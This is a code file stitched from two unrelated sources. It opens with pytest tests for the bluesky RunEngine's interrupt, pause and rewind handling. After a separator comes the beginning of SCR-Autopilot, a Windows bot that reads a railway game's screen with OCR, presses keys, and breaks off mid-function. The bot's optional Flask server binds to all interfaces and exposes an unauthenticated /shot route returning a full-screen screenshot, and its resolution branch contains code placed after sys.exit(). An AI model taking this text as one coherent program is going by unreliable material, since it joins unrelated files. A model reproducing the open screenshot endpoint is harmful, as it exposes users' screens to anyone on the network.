RE(infinite_plan(), {'start': hanging_callback})
# Check that hammering SIGINT escaped from that 10-second sleep.
assert ttime.time() - start_time < 2
# The KeyboardInterrupt will have been converted to a hard pause.
assert RE.state == 'idle'
# Check that hammering SIGINT escaped from that 10-second sleep.
assert ttime.time() - start_time < 2
def test_no_context_manager(RE):
# Clear the context managers so that RE will not react to sigint
RE.context_managers = []
# Proceed as normal
pid = os.getpid()
def sim_kill(n=1):
for j in range(n):
print('KILL', j)
ttime.sleep(0.05)
os.kill(pid, signal.SIGINT)
def hanging_plan():
"a plan that blocks the RunEngine's normal Ctrl+C handing with a sleep"
ttime.sleep(2)
yield Msg('null')
# Only send one SIGINT
timer = threading.Timer(0.5, sim_kill, (1,))
timer.start()
t = threading.Thread(target=RE, args=(hanging_plan()))
start = ttime.time()
t.start()
# Wait for the KeyboardInterrupt and handle in the main thread
with pytest.raises(KeyboardInterrupt):
ttime.sleep(5)
t.join()
delta = ttime.time() - start
# Hanging plan finished, but extra sleep did not
assert 2 < delta < 5
def test_many_context_managers(RE):
class Manager:
enters = 0
exits = 0
def __init__(self, RE):
pass
def __enter__(self):
Manager.enters += 1
def __exit__(self, *args, **kwargs):
Manager.exits += 1
n = 42
RE.context_managers.extend([Manager]*n)
RE([Msg('null')])
assert Manager.enters == n
assert Manager.exits == n
def _make_plan_marker():
@reset_positions_decorator()
def raiser(motor):
for j in range(15):
yield Msg('set', motor, j)
raise RuntimeError()
@reset_positions_decorator()
def pausing_raiser(motor):
for j in range(15):
yield Msg('set', motor, j)
yield Msg('pause')
raise RuntimeError()
@reset_positions_decorator()
def bad_set(motor):
for j in range(15):
yield Msg('set', motor, j)
yield Msg('set', None, j)
@reset_positions_decorator()
def bad_msg(motor):
for j in range(15):
yield Msg('set', motor, j)
yield Msg('aardvark')
@reset_positions_decorator()
def cannot_pauser(motor):
yield Msg('clear_checkpoint')
for j in range(15):
yield Msg('set', motor, j)
yield Msg('pause')
return pytest.mark.parametrize('plan', [raiser, bad_set, bad_msg,
pausing_raiser, cannot_pauser])
@_make_plan_marker()
def test_cleanup_pathological_plans(RE, hw, plan):
motor = hw.motor
motor.set(1024)
try:
try:
RE(plan(motor))
except RunEngineInterrupted:
pass
if RE.state == 'paused':
assert motor.position != 1024
RE.resume()
except Exception:
pass
assert motor.position == 1024
def test_finalizer_closeable():
pre = (j for j in range(18))
post = (j for j in range(18))
plan = finalize_wrapper(pre, post)
for j in range(3):
next(plan)
plan.close()
def test_invalid_generator(RE, hw, capsys):
motor = hw.motor
from bluesky.utils import ts_msg_hook
RE.msg_hook = ts_msg_hook
# this is not a valid generator as it will try to yield if it
# is throw a GeneratorExit
def patho_finalize_wrapper(plan, post):
try:
yield from plan
finally:
yield from post
def base_plan(motor):
for j in range(5):
yield Msg('set', motor, j * 2 + 1)
yield Msg('pause')
def post_plan(motor):
yield Msg('set', motor, 500)
def pre_suspend_plan():
yield Msg('set', motor, -500)
raise GeneratorExit('this one')
def make_plan():
return patho_finalize_wrapper(base_plan(motor),
post_plan(motor))
with pytest.raises(RunEngineInterrupted):
RE(make_plan())
RE.request_suspend(None, pre_plan=pre_suspend_plan())
capsys.readouterr()
try:
RE.resume()
except ValueError as sf:
assert sf.__cause__.args[0] == 'this one'
actual_err, _ = capsys.readouterr()
expected_prefix = 'The plan '
expected_postfix = (' tried to yield a value on close. '
'Please fix your plan.\n')[::-1]
assert actual_err[:len(expected_prefix)] == expected_prefix
assert actual_err[::-1][:len(expected_postfix)] == expected_postfix
def test_exception_cascade_REside(RE):
except_hit = False
def pausing_plan():
nonlocal except_hit
for j in range(5):
yield Msg('null')
try:
yield Msg('pause')
except Exception:
except_hit = True
raise
def pre_plan():
yield Msg('aardvark')
def post_plan():
for j in range(5):
yield Msg('null')
with pytest.raises(RunEngineInterrupted):
RE(pausing_plan())
ev = _fabricate_asycio_event(RE.loop)
ev.set()
RE.request_suspend(ev.wait, pre_plan=pre_plan())
with pytest.raises(KeyError):
RE.resume()
assert except_hit
def test_exception_cascade_planside(RE):
except_hit = False
def pausing_plan():
nonlocal except_hit
for j in range(5):
yield Msg('null')
try:
yield Msg('pause')
except Exception:
except_hit = True
raise
def pre_plan():
yield Msg('null')
raise RuntimeError()
def post_plan():
for j in range(5):
yield Msg('null')
with pytest.raises(RunEngineInterrupted):
RE(pausing_plan())
ev = _fabricate_asycio_event(RE.loop)
ev.set()
RE.request_suspend(ev.wait, pre_plan=pre_plan())
with pytest.raises(RuntimeError):
RE.resume()
assert except_hit
def test_sideband_cancel(RE):
loop = RE.loop
ev = _fabricate_asycio_event(RE.loop)
def done():
ev.set()
def side_band_kill():
RE.loop.call_soon_threadsafe(RE._task.cancel)
scan = [Msg('wait_for', None, [ev.wait, ]), ]
assert RE.state == 'idle'
start = ttime.time()
threading.Timer(.5, side_band_kill).start()
loop.call_soon_threadsafe(
loop.call_later, 2, done)
RE(scan)
assert RE.state == 'idle'
assert RE._task.cancelled()
stop = ttime.time()
assert .5 < (stop - start) < 2
def test_no_rewind(RE):
msg_lst = []
def msg_collector(msg):
msg_lst.append(msg)
RE.rewindable = False
plan = [Msg('null')] * 3 + [Msg('pause')] + [Msg('null')] * 3
RE.msg_hook = msg_collector
with pytest.raises(RunEngineInterrupted):
RE(plan)
RE.resume()
assert msg_lst == plan
def test_no_rewindable_msg(RE):
RE.rewindable = True
msg_lst = []
def msg_collector(msg):
msg_lst.append(msg)
plan = ([Msg('null')] * 3 +
[Msg('pause'), Msg('rewindable', None, False)] +
[Msg('null')] * 3)
RE.msg_hook = msg_collector
with pytest.raises(RunEngineInterrupted):
RE(plan)
RE.resume()
assert msg_lst[:4] == plan[:4]
assert msg_lst[4:7] == plan[:3]
assert msg_lst[7:] == plan[4:]
@pytest.mark.parametrize('start_state', [True, False])
def test_rewindable_state_retrival(RE, start_state):
RE.rewindable = start_state
def rewind_plan(start_value):
ret = yield Msg('rewindable', None, None)
assert ret is start_state
cache_state = ret
ret = yield Msg('rewindable', None, start_state)
assert ret is start_state
ret = yield Msg('rewindable', None, not start_state)
assert ret is (not start_state)
ret = yield Msg('rewindable', None, cache_state)
assert ret is start_state
RE(rewind_plan(start_state))
assert RE.rewindable is start_state
@pytest.mark.parametrize('start_state,msg_seq', ((True, ['open_run',
'rewindable',
'rewindable',
'trigger',
'trigger',
'wait',
'create',
'read',
'read',
'save',
'rewindable',
'close_run']),
(False, ['open_run',
'rewindable',
'trigger',
'trigger',
'wait',
'create',
'read',
'read',
'save',
'close_run'])))
def test_nonrewindable_detector(RE, hw, start_state, msg_seq):
class FakeSig:
def get(self):
return False
hw.det.rewindable = FakeSig()
RE.rewindable = start_state
m_col = MsgCollector()
RE.msg_hook = m_col
RE(run_wrapper(trigger_and_read([hw.motor, hw.det])))
assert [m.command for m in m_col.msgs] == msg_seq
@pytest.mark.parametrize('start_state,msg_seq', ((True,
['rewindable',
'rewindable',
'aardvark',
'rewindable']),
(False, ['rewindable',
'aardvark'])))
def test_nonrewindable_finalizer(RE, hw, start_state, msg_seq):
class FakeSig:
def get(self):
return False
det = hw.det
det.rewindable = FakeSig()
RE.rewindable = start_state
m_col = MsgCollector()
RE.msg_hook = m_col
def evil_plan():
assert RE.rewindable is False
yield Msg('aardvark')
with pytest.raises(KeyError):
RE(rewindable_wrapper(evil_plan(), False))
assert RE.rewindable is start_state
assert [m.command for m in m_col.msgs] == msg_seq
def test_halt_from_pause(RE):
except_hit = False
m_coll = MsgCollector()
RE.msg_hook = m_coll
def pausing_plan():
nonlocal except_hit
for j in range(5):
yield Msg('null')
try:
yield Msg('pause')
except Exception:
yield Msg('null')
except_hit = True
raise
with pytest.raises(RunEngineInterrupted):
RE(pausing_plan())
RE.halt()
assert not except_hit
assert [m.command for m in m_coll.msgs] == ['null'] * 5 + ['pause']
def test_halt_async(RE):
except_hit = False
m_coll = MsgCollector()
RE.msg_hook = m_coll
def sleeping_plan():
nonlocal except_hit
try:
yield Msg('sleep', None, 50)
except Exception:
yield Msg('null')
except_hit = True
raise
threading.Timer(.1, RE.halt).start()
start = ttime.time()
with pytest.raises(RunEngineInterrupted):
RE(sleeping_plan())
stop = ttime.time()
assert .09 < stop - start < 5
assert not except_hit
assert [m.command for m in m_coll.msgs] == ['sleep']
@pytest.mark.parametrize('cancel_func',
[lambda RE: RE.stop(), lambda RE: RE.abort(),
lambda RE: RE.request_pause(defer=False)])
def test_prompt_stop(RE, cancel_func):
except_hit = False
m_coll = MsgCollector()
RE.msg_hook = m_coll
def sleeping_plan():
nonlocal except_hit
try:
yield Msg('sleep', None, 50)
except Exception:
yield Msg('null')
except_hit = True
raise
threading.Timer(.1, partial(cancel_func, RE)).start()
start = ttime.time()
with pytest.raises(RunEngineInterrupted):
RE(sleeping_plan())
stop = ttime.time()
if RE.state != 'idle':
RE.abort()
assert 0.09 < stop - start < 5
assert except_hit
assert [m.command for m in m_coll.msgs] == ['sleep', 'null']
@pytest.mark.parametrize('change_func', [lambda RE: RE.stop(),
lambda RE: RE.abort(),
lambda RE: RE.halt(),
lambda RE: RE.request_pause(),
lambda RE: RE.request_pause(defer=True),
lambda RE: RE.resume()])
def test_bad_from_idle_transitions(RE, change_func):
with pytest.raises(TransitionError):
change_func(RE)
def test_empty_cache_pause(RE):
RE.rewindable = False
pln = [Msg('open_run'),
Msg('create', name='primary'),
Msg('pause'),
Msg('save'),
Msg('close_run')]
with pytest.raises(RunEngineInterrupted):
RE(pln)
RE.resume()
def test_state_hook(RE):
states = []
def log_state(new, old):
states.append((new, old))
RE.state_hook = log_state
with pytest.raises(RunEngineInterrupted):
RE([Msg('open_run'), Msg('pause'), Msg('close_run')])
RE.resume()
expected = [('running', 'idle'),
('pausing', 'running'),
('paused', 'pausing'),
('running', 'paused'),
('idle', 'running')]
assert states == expected
def test_max_depth(RE):
RE.max_depth is None
RE([]) # should not raise
# assume test framework needs less than 100 stacks... haha
RE.max_depth = 100
RE([]) # should not raise
RE.max_depth = 0
with pytest.raises(RuntimeError):
RE([])
def test_preprocessors(RE):
def custom_cleanup(plan):
yield from plan
yield Msg('null', 'cleanup') # just a sentinel
def my_sub(name, doc):
pass
def custom_subs(plan):
yield from subs_wrapper(plan, my_sub)
RE.preprocessors = [custom_cleanup, custom_subs]
actual = []
RE.msg_hook = lambda msg: actual.append(msg)
RE([Msg('null')])
print(actual)
expected = [Msg('subscribe', None, my_sub, 'all'),
Msg('null'),
Msg('null', 'cleanup'),
Msg('unsubscribe', None, token=0)]
assert actual == expected
@requires_ophyd
def test_pardon_failures(RE):
from ophyd import StatusBase
st = StatusBase()
class Dummy:
name = 'dummy'
def set(self, val):
return st
dummy = Dummy()
RE([Msg('set', dummy, 1)])
st._finished(success=False)
RE([Msg('null')])
@requires_ophyd
def test_failures_kill_run(RE):
# just to make sure that 'pardon_failures' does not block *real* failures
from ophyd import StatusBase
class Dummy:
name = 'dummy'
def set(self, val):
st = StatusBase()
st._finished(success=False)
return st
dummy = Dummy()
with pytest.raises(FailedStatus):
RE([Msg('set', dummy, 1, group='test'),
Msg('wait', group='test')])
def test_colliding_streams(RE, hw):
collector = {'primary': [], 'baseline': []}
descs = {}
def local_cb(name, doc):
if name == 'descriptor':
descs[doc['uid']] = doc['name']
elif name == 'event':
collector[descs[doc['descriptor']]].append(doc)
RE(baseline_wrapper(grid_scan([hw.motor],
hw.motor, -1, 1, 5,
hw.motor1, -5, 5, 7, True),
[hw.motor, hw.motor1]),
local_cb)
assert len(collector['primary']) == 35
assert len(collector['baseline']) == 2
assert list(range(1, 36)) == [e['seq_num'] for e in collector['primary']]
assert list(range(1, 3)) == [e['seq_num'] for e in collector['baseline']]
def test_old_subscribe(RE):
# Old usage had reversed argument order. It should warn but still work.
collector = []
def collect(name, doc):
collector.append(doc)
with pytest.warns(UserWarning):
RE.subscribe('all', collect)
RE([Msg('open_run'), Msg('close_run')])
assert len(collector) == 2
RE.unsubscribe(0)
with pytest.warns(UserWarning):
RE.subscribe('start', collect)
RE([Msg('open_run'), Msg('close_run')])
assert len(collector) == 3
RE.unsubscribe(1)
def test_waiting_hook(RE, hw):
collector = []
def collect(sts):
collector.append(sts)
RE.waiting_hook = collect
RE([Msg('set', hw.motor, 5, group='A'), Msg('wait', group='A')])
sts, none = collector
assert isinstance(sts, set)
assert len(sts) == 1
assert none is None
collector.clear()
RE([Msg('set', hw.motor1, 5, group='A'),
Msg('set', hw.motor2, 3, group='A'),
Msg('wait', group='A')])
sts, none = collector
assert isinstance(sts, set)
assert len(sts) == 2
assert none is None
collector.clear()
def test_hints(RE):
class Detector:
def __init__(self, name):
self.name = name
self.parent = None
self.hints = {'vis': 'placeholder'}
def read(self):
return {}
def describe(self):
return {}
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
det = Detector('det')
collector = []
RE(count([det]),
{'descriptor': lambda name, doc: collector.append(doc)})
doc = collector.pop()
assert doc['hints']['det'] == {'vis': 'placeholder'}
def test_filled(RE, hw, db):
collector = []
def collect(name, doc):
if name == 'event':
collector.append(doc)
RE(count([hw.det]), collect)
event, = collector
assert event['filled'] == {}
collector.clear()
RE(count([hw.img]), collect)
event, = collector
assert event['filled'] == {'img': False}
def test_double_call(RE):
uid1 = RE(count([]))
uid2 = RE(count([]))
assert uid1 != uid2
def test_num_events(RE, hw, db):
RE.subscribe(db.insert)
rs1 = RE(count([]))
if RE._call_returns_result:
uid1 = rs1.run_start_uids[0]
else:
uid1 = rs1[0]
h = db[uid1]
assert h.stop['num_events'] == {}
rs2 = RE(count([hw.det], 5))
if RE._call_returns_result:
uid2 = rs2.run_start_uids[0]
else:
uid2 = rs2[0]
h = db[uid2]
assert h.stop['num_events'] == {'primary': 5}
sd = SupplementalData(baseline=[hw.det])
RE.preprocessors.append(sd)
rs3 = RE(count([]))
if RE._call_returns_result:
uid3 = rs3.run_start_uids[0]
else:
uid3 = rs3[0]
h = db[uid3]
assert h.stop['num_events'] == {'baseline': 2}
rs4 = RE(count([hw.det], 5))
if RE._call_returns_result:
uid4 = rs4.run_start_uids[0]
else:
uid4 = rs4[0]
h = db[uid4]
assert h.stop['num_events'] == {'primary': 5, 'baseline': 2}
def test_raise_if_interrupted_deprecation(RE):
with pytest.warns(UserWarning):
RE([], raise_if_interrupted=True)
@pytest.mark.parametrize('bail_func,status', (('resume', 'success'),
('stop', 'success'),
('abort', 'abort'),
('halt', 'abort')))
def test_force_stop_exit_status(bail_func, status, RE):
d = DocCollector()
RE.subscribe(d.insert)
@run_decorator()
def bad_plan():
print('going in')
yield Msg('pause')
with pytest.raises(RunEngineInterrupted):
RE(bad_plan())
rs = getattr(RE, bail_func)()
if RE._call_returns_result:
if bail_func == "resume":
assert rs.plan_result is not RE.NO_PLAN_RETURN
else:
assert rs.plan_result is RE.NO_PLAN_RETURN
uid = rs.run_start_uids[0]
assert rs.exit_status == status
else:
uid = rs[0]
assert len(d.start) == 1
assert d.start[0]['uid'] == uid
assert len(d.stop) == 1
assert d.stop[uid]['exit_status'] == status
def test_exceptions_exit_status(RE):
d = DocCollector()
RE.subscribe(d.insert)
class Snowflake(Exception):
...
@run_decorator()
def bad_plan():
yield Msg('null')
raise Snowflake('boo')
with pytest.raises(Snowflake) as sf:
RE(bad_plan())
assert len(d.start) == 1
rs = d.start[0]['uid']
assert len(d.stop) == 1
assert d.stop[rs]['exit_status'] == 'fail'
assert d.stop[rs]['reason'] == str(sf.value)
def test_plan_return(RE):
if not RE._call_returns_result:
pytest.skip()
def test_plan():
yield Msg('null')
return 'plan_result'
rs = RE(test_plan())
assert rs.plan_result == "plan_result"
assert rs.exit_status == "success"
assert rs.interrupted is False
def test_plan_return_resume(RE):
if not RE._call_returns_result:
pytest.skip()
def test_plan():
yield Msg('null')
yield Msg('pause')
return 'plan_result'
with pytest.raises(RunEngineInterrupted):
RE(test_plan())
rs = RE.resume()
assert rs.plan_result == "plan_result"
assert rs.exit_status == "success"
def test_drop(RE, hw):
det = hw.det
def inner(msg):
yield Msg('create', name='primary')
yield Msg('read', det)
yield Msg(msg)
# Drop first, drop after saving, save after dropping
def plan():
yield Msg('open_run')
yield from inner('drop')
yield from inner('save')
yield from inner('drop')
yield from inner('save')
yield from inner('save')
yield Msg('close_run')
docs = defaultdict(list)
def collector(name, doc):
docs[name].append(doc)
RE(plan(), collector)
assert len(docs['event']) == 3
def test_failing_describe_callback(RE, hw):
class TestException(Exception):
pass
det = hw.det
det2 = hw.det2
def evil_cb(name, doc):
if any(k in doc['data_keys'] for k in det.describe()):
raise TestException
RE.subscribe(evil_cb, 'descriptor')
def plan():
yield Msg('open_run')
try:
yield Msg('create', name='primary')
yield Msg('read', det)
yield Msg('save')
finally:
yield Msg('create', name='primary')
yield Msg('read', det2)
yield Msg('save')
yield Msg('close_run')
with pytest.raises(TestException):
RE(plan())
def test_print_commands(RE):
''' test the printing of commands available.
NOTE : An error here likely just means that this interface has changed.
You'll likely want to change the test.
(A test here is still a good idea as it at least raises awareness about
the changes made breaking past API)
'''
# testing the commands list
commands1 = list(RE._command_registry.keys())
commands2 = RE.commands
assert commands1 == commands2
# testing print commands
# copy and paste most of the code...
verbose = False
print_command_reg1 = "List of available commands\n"
for command, func in RE._command_registry.items():
docstring = func.__doc__
if verbose is False:
docstring = docstring.split("\n")[0]
print_command_reg1 = print_command_reg1 +\
"{} : {}\n".format(command, docstring)
print_command_reg2 = RE.print_command_registry()
assert print_command_reg1 == print_command_reg2
def test_broken_read_exception(RE):
class Dummy:
def __init__(self, name):
self.name = name
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
def describe(self):
return {}
def read(self):
...
obj = Dummy('broken read')
with pytest.raises(RuntimeError):
RE([Msg('read', obj)])
def test_self_describe(RE):
def inner():
cls = yield Msg('RE_class')
assert type(RE) is cls
RE(inner())
def test_thread_name(RE):
"The RunEngine event loop should be on a thread with a given name."
from ophyd.status import Status
class MockDevice:
name = "mock_device"
def trigger(self):
assert threading.current_thread().name == "bluesky-run-engine"
return Status()
d = MockDevice()
RE([Msg("trigger", d)])
|
main.py
|
import numpy as nm
import pytesseract
import re
import pydirectinput
import time
import cv2
import math
from PIL import ImageGrab
from PIL import ImageFilter
import sched
import sys
import tkinter
from tkinter import ttk, simpledialog, messagebox
from throttle import *
import requests
import logging
from win32 import win32api
import webbrowser
import ctypes
from ahk import AHK
from multiprocessing import Process, Value
import socket
from flask import Flask
from flask import render_template
from flask import request, redirect, send_file
active = Value(ctypes.c_bool, False)
newchange = Value(ctypes.c_bool, False)
def ws(active, newchange):
app = Flask(__name__)
@app.route('/')
def home():
return render_template("index.html", toggle=active.value)
@app.route('/status')
def status():
status = { "toggle": active.value }
return status
@app.route('/status/off')
def status_off():
active.value = False
status = { "toggle": active.value, "response": 200 }
return status
@app.route('/status/on')
def status_on():
active.value = True
status = { "toggle": active.value, "response": 200 }
return status
@app.route('/shot')
def shot():
im = ImageGrab.grab()
im.save("temp/screenshot.png")
return send_file("temp/screenshot.png", "PNG")
@app.route("/send", methods=["POST"])
def send():
newchange.value = True
form = request.form
try:
if form["switch"] == "on":
active.value = True
else:
active.value = False
except:
active.value = False
return redirect("/")
def run():
app.run(host='0.0.0.0', port='7878')
run()
if __name__ == '__main__':
root = tkinter.Tk()
photo = tkinter.PhotoImage(file="img/ap_icon_new.png")
root.title("button")
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
w = 50
h = 50
x = 100
y = 100
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.lift()
root.overrideredirect(True)
root.call('wm', 'attributes', '.', '-topmost', '1')
button = tkinter.Button(root, text="button1",
image=photo, bg="orange")
button.grid(column=1, row=1, sticky=tkinter.E+tkinter.W)
root.grid_columnconfigure(2, weight=2)
try:
ahk = AHK()
except:
print("AutoHotkey was not found! Please install it in order to continue.")
exit()
continue_route = False
print("SCR-Autopilot v0.4.1-beta by MaTY")
print("Checking for updates...")
URL = "https://matyapi.matymt.repl.co/scr-autopilot/newest-version"
r = requests.get(url=URL)
data = r.json()
version = data['version']
if not version == "0.4.1":
print("Your version is outdated! Please install the latest release on https://github.com/scr-autopilot/scr-autopilot/releases")
outdatedask = messagebox.askyesno(
"SCR-Autopilot", "Your version of SCR-Autopilot is outdated. Do you want to go to the releases page to download a new version?")
if outdatedask == True:
webbrowser.open(
"https://github.com/scr-autopilot/scr-autopilot/releases")
exit()
else:
print("Your version is up-to-date.")
logging.basicConfig(filename='autopilot.log', filemode='w',
level=logging.DEBUG, format="[%(levelname)s] [%(asctime)s] %(message)s")
print("\nDisclaimer:\nSCR-Autopilot is still in a beta version so it can't handle some situations well.\nWe recommend using SCR-Autopilot on private servers.\nUSE OF THIS SOFTWARE AT YOUR RISK.\nWaiting for the user input in the dialog box.")
warningask = messagebox.askokcancel("Disclaimer", "SCR-Autopilot is still in a beta version so it can't handle some situations well.\nWe recommend using SCR-Autopilot on private servers.\n\nUSE OF THIS SOFTWARE AT YOUR RISK.", icon='warning')
if warningask == False:
exit()
display_size = ImageGrab.grab().size
logging.debug(f'Display resolution: {display_size[0]}, {display_size[1]}')
resolution = simpledialog.askstring(
"Question", "What is the resolution? (fhd, hd)")
if resolution == "fhd":
spd_pos = 884, 957, 947, 985
lim_pos = 889, 987, 942, 1016
green_pos = 1440, 983, 1441, 984
yellow_pos = 1438, 1016, 1439, 1017
double_yellow_pos = 1438, 950, 1439, 951
red_pos = 1438, 1045, 1439, 1046
distance_pos = 555, 1046, 605, 1070
awsbutton_pos = 1330, 994, 1331, 995
throttle_pos = 843, 931, 845, 1074
doors_pos = 870, 822, 871, 823
loading_pos = 781, 823, 782, 824
continue_pos = 1032, 460, 1033, 461
undershoot_pos = 709, 906, 710, 907
awaiting_pos = 862, 823, 863, 824
buzzer_pos = 824, 816, 825, 817
elif resolution == "hd":
messagebox.showerror(
"Error", 'HD resolution is not supported in this version of SCR-Autopilot. Please install v0.3.1-beta to use the HD resolution.')
sys.exit()
time.sleep(1)
spd_pos = 573, 594, 630, 630
lim_pos = 569, 627, 618, 653
green_pos = 1118, 624, 1119, 625
yellow_pos = 1120, 654, 1121, 655
double_yellow_pos = 1120, 590, 1121, 591
red_pos = 1120, 688, 1121, 689
distance_pos = 239, 686, 284, 708
awsbutton_pos = 1047, 597, 1048, 598
throttle_pos = 522, 570, 525, 713
else:
messagebox.showerror(
"Error", 'Please type only "fhd" (without the quotation marks) if you have FHD monitor, or type "hd" (without the quotation marks) if you have HD monitor.')
sys.exit()
max_speed = simpledialog.askinteger(
"Question", "What is the maximum speed of your train in MPH? (E.g. 100, 125, 75 etc.)", minvalue=1)
continue_ask = messagebox.askyesno(
"Question", "Would you like to automatically continue in the route after finsihing?")
if max_speed == None:
messagebox.showerror("Error", 'Settings incorrect. Please try again.')
exit()
if continue_ask == True:
continue_route = True
PROCESS_PER_MONITOR_DPI_AWARE = 2
MDT_EFFECTIVE_DPI = 0
def print_dpi():
shcore = ctypes.windll.shcore
monitors = win32api.EnumDisplayMonitors()
hresult = shcore.SetProcessDpiAwareness(PROCESS_PER_MONITOR_DPI_AWARE)
assert hresult == 0
dpiX = ctypes.c_uint()
dpiY = ctypes.c_uint()
for i, monitor in enumerate(monitors):
shcore.GetDpiForMonitor(
monitor[0].handle,
MDT_EFFECTIVE_DPI,
ctypes.byref(dpiX),
ctypes.byref(dpiY)
)
logging.debug(
f"Monitor {i} = dpiX: {dpiX.value}, dpiY: {dpiY.value}"
)
print_dpi()
pytesseract.pytesseract.tesseract_cmd = 'C:/Program Files (x86)/Tesseract-OCR/tesseract.exe'
time.sleep(1)
solve = None
continuing = False
ignorelim = False
ignoreaws = False
wsask = continue_ask = messagebox.askyesno(
"Question", "Would you like to start a webserver so you can remotely control the autopilot?")
if wsask == True:
print("Starting the webserver...")
p = Process(target=ws, args=(active,newchange,))
p.start()
time.sleep(3)
print("\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
print(""" ___ ___ ___ _ _ _ _ _
/ __|/ __| _ \___ /_\ _ _| |_ ___ _ __(_) |___| |_
\__ \ (__| /___/ _ \ || | _/ _ \ '_ \ | / _ \ _|
|___/\___|_|_\ /_/ \_\_,_|\__\___/ .__/_|_\___/\__|
|_|
""")
print("Press the red button that has appeared on your screen to engage the autopilot. You can press the button again to disengage the autopilot.")
if wsask == True:
print("\n\nFor the remote control, navigate to:", "http://" + socket.gethostbyname(socket.gethostname()) + ":7878 on a different device.","\nYou need to be on a same network to open the website.\n\n")
print("Settings:")
print("Screen resolution:", resolution)
print("Train max speed:", max_speed)
print("Automatically continue:", continue_route)
def task():
global solve
global continuing
global ignorelim
global ignoreaws
print("ignorelim", ignorelim)
if continue_route == True:
im = ImageGrab.grab(bbox=(continue_pos))
pix = im.load()
continue_value = pix[0, 0] # Set the RGBA Value of the image (tuple)
if continue_value == (255, 255, 255):
continuing = True
ahk.click(991, 470)
ahk.click(327, 833)
im = ImageGrab.grab(bbox=(awsbutton_pos))
pix = im.load()
awsbutton_value = pix[0, 0] # Set the RGBA Value of the image (tuple)
if awsbutton_value == (255, 255, 255):
pydirectinput.keyDown("q")
pydirectinput.keyUp("q")
print("Reset the AWS")
logging.debug(f'AWS pixel RGB: {awsbutton_value}')
cap = ImageGrab.grab(bbox=(throttle_pos))
img = cap
count = 0
bottom_throttle_pixel = None
for y in range(img.height):
for x in range(img.width):
pixel = img.getpixel((x, y))
if y == img.height - 1:
bottom_throttle_pixel = pixel
if pixel == (0, 176, 85):
count += 1
currentThrottle = int(math.floor(100 * (count / 142)))
speed = currentThrottle/100 * max_speed
if currentThrottle == 0:
logging.debug(f'Throttle pixel RGB: {bottom_throttle_pixel}')
print("Current throttle: ", currentThrottle)
if currentThrottle == None:
messagebox.showerror("Error", "I can't read the throttle")
supportask = messagebox.askyesno(
"Question", "It looks like you got an error. You can try again, but if this error persists, you can join the support server. Do you want to join the support server on Discord?")
if supportask == True:
webbrowser.open(
"https://discord.gg/jtQ2R8cxWq")
exit()
else:
# LIMIT
cap = ImageGrab.grab(bbox=(lim_pos))
cap = cap.filter(ImageFilter.MedianFilter())
cap = cv2.cvtColor(nm.array(cap), cv2.COLOR_RGB2GRAY)
tesstr = pytesseract.image_to_string(
cap,
config="--psm 7")
lim = 0
lim = [int(s) for s in re.findall(r'\b\d+\b', tesstr)]
if lim == []:
if continuing == False and ignorelim == False:
messagebox.showerror("Error", "I can't read the limit")
supportask = messagebox.askyesno(
"Question", "It looks like you got an error. You can try again, but if this error persists, you can join the support server. Do you want to join the support server on Discord?")
if supportask == True:
webbrowser.open(
"https://discord.gg/jtQ2R8cxWq")
exit()
else:
cap = ImageGrab.grab()
src = nm.array(cap)
gray = cv2.cvtColor(src, cv2.COLOR_RGB2GRAY)
gray = cv2.medianBlur(gray, 5)
rows = gray.shape[0]
circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1, rows / 8,
param1=100, param2=30,
minRadius=1, maxRadius=30)
if circles is not None:
circles = nm.uint16(nm.around(circles))
for i in circles[0, :]:
x = i[0] - i[2]
y = i[1] - i[2]
w = 2*i[2]
h = 2*i[2]
center = (i[0], i[1])
if w > 39:
txt = pytesseract.image_to_string(gray[y:y+h, x:x+w], config="--psm 6")
if "W" in txt:
pydirectinput.keyDown("h")
pydirectinput.keyUp("h")
cv2.circle(src, center, 1, (0, 100, 100), 3)
radius = i[2]
cv2.circle(src, center, radius, (255, 0, 255), 3)
templim = lim[0]
lim = lim[0]
lim = int(lim)
if ignoreaws == False:
im = ImageGrab.grab(bbox=(red_pos))
pix = im.load()
# Set the RGBA Value of the image (tuple)
red_value = pix[0, 0]
im = ImageGrab.grab(bbox=(yellow_pos))
pix = im.load()
# Set the RGBA Value of the image (tuple)
yellow_value = pix[0, 0]
im = ImageGrab.grab(bbox=(green_pos))
pix = im.load()
# Set the RGBA Value of the image (tuple)
green_value = pix[0, 0]
im = ImageGrab.grab(bbox=(double_yellow_pos))
pix = im.load()
# Set the RGBA Value of the image (tuple)
double_yellow_value = pix[0, 0]
if red_value == (255, 0, 0):
print("AWS:", "red")
lim = 0
if yellow_value == (255, 190, 0):
print("AWS:", "yellow")
if templim > 45:
lim = 45
if double_yellow_value == (255, 190, 0):
print("AWS:", "double_yellow")
if templim > 75:
lim = 75
if green_value == (0, 255, 0):
print("AWS:", "green")
print("Limit: ", lim)
limitThrottle = int((lim / max_speed) * 100)
print("Limit throttle: ", limitThrottle)
cap = ImageGrab.grab(bbox=(distance_pos))
cap = cap.filter(ImageFilter.MedianFilter())
cap = cv2.cvtColor(nm.array(cap), cv2.COLOR_RGB2GRAY)
tesstr = pytesseract.image_to_string(
cap,
config="--psm 6")
distance = 0
distance = [int(s) for s in re.findall(r'\b\d+\b', tesstr)]
try:
m_distance = distance[0]
distance = distance[1]
print(m_distance, distance)
if distance == 00 and m_distance == 0 or continuing == True:
im = ImageGrab.grab(bbox=(loading_pos))
pix = im.load()
loading_value = pix[0, 0]
im = ImageGrab.grab(bbox=(doors_pos))
pix = im.load()
doors_value = pix[0, 0]
im = ImageGrab.grab(bbox=(undershoot_pos))
pix = im.load()
undershoot_value = pix[0, 0]
im = ImageGrab.grab(bbox=(awaiting_pos))
pix = im.load()
awaiting_value = pix[0, 0]
im = ImageGrab.grab(bbox=(buzzer_pos))
pix = im.load()
buzzer_value = pix[0, 0]
print(buzzer_value)
if undershoot_value == (255, 255, 255):
print("UNDERSHOOT")
pydirectinput.keyDown("w")
time.sleep(0.4)
pydirectinput.keyUp("w")
if doors_value == (255, 255, 255):
print("CLOSING DOORS")
pydirectinput.keyDown("t")
pydirectinput.keyUp("t")
time.sleep(4)
continuing = False
ignorelim = False
ignoreaws = False
elif loading_value == (255, 255, 255):
print("LOADING")
elif awaiting_value == (255, 255, 255):
print("WAITING FOR GUARD")
